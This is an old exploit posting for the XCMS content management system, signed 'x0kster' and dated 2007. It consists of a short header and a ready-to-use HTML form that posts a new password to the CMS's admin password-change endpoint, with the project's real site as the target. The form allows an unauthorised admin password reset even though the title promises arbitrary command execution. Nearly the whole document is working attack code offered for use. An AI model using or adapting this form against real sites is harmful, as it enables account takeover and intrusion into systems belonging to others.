xcms all version arbitrary code execution
<!--
-[ Name : XCMS Arbitrary Command Execution Vulnerability ]-
-[ Download : http://www.xcms.it/index.php?lng=it&mod=download&pg=indice&c=2 ]-
-[ Author : x0kster ]-
-[ Email : x0kster[AT]gmail[DOT]com ]-
-[ Date : 20-09-2007 ]-
-->
<html>
<head>
<title>-XCMS Arbitrary Command Execution Vuln by x0kster -</title>
</head>
<body>
<pre>
- [XCMS All Version Arbitrary Command Execution Vulnerability ] -
- [Bug found by x0kster - x0kster@xxxxxxxxx ] -
</pre>
<form name="pass" method="post"
action="http://www.xcms.it/index.php?lng=it&pg=admin&s=cpass";>
<input type="hidden" name="pass" value="1190316852" />
<pre>
Password : <input type="password" size="20" name="password_1190316852" />
Repete password : <input type="password" size="20" name="rpassword_1190316852"
/>
<input type="submit" value="Modifica Password" />
</pre>
</form>
</body>
</html>